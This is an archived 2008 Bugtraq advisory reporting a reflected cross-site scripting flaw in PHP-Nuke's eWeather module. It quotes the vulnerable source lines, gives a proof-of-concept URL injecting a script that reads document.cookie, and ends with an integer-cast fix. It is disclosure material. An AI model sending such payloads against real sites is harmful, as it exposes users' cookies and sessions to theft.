Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: XSS in PHP-Nuke (eWeather module)

XSS in PHP-Nuke (eWeather module)

From: <nima_501_at_yahoo.com>
Date: 13 Mar 2008 09:11:27 -0000
('binary' encoding is not supported, stored as-is) //////////XSS in PHP-Nuke (eWeather module)

PHP-Nuke (http://phpnuke.org):

        PHP-Nuke is a news automated system specially designed to be used in
Intranets and Internet. The Administrator has total control of his web site,
registered users, and he will have in the hand a powerful assembly of tools
to maintain an active and 100% interactive web site using databases.

eWeather module (http://www.janitorialservice.us):

        Weather module based on eWeather.biz data with 3 additional blocks
2 side and one center block.

///Details

>From source-code of /modules/eWeather/index.php

Line 35: $zipCode=$chart;

Line 47: echo "<div align =\"center\"><h2>USA weather for zip code $zipCode</h2>";

"chart" variable is unvalidated.

///Exploit
http://example.net/modules.php?name=eWeather&chart=[XSS]
http://example.net/modules.php?name=eWeather&chart=%3Cscript%3Ealert(document.cookie)%3C/script%3E

///Fix
Change line 35 to "$zipCode=(int)$chart;"

///Author:
NetJackal

http://netjackal.by.ru
http://hackerz.ir
Received on Mar 13 2008

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]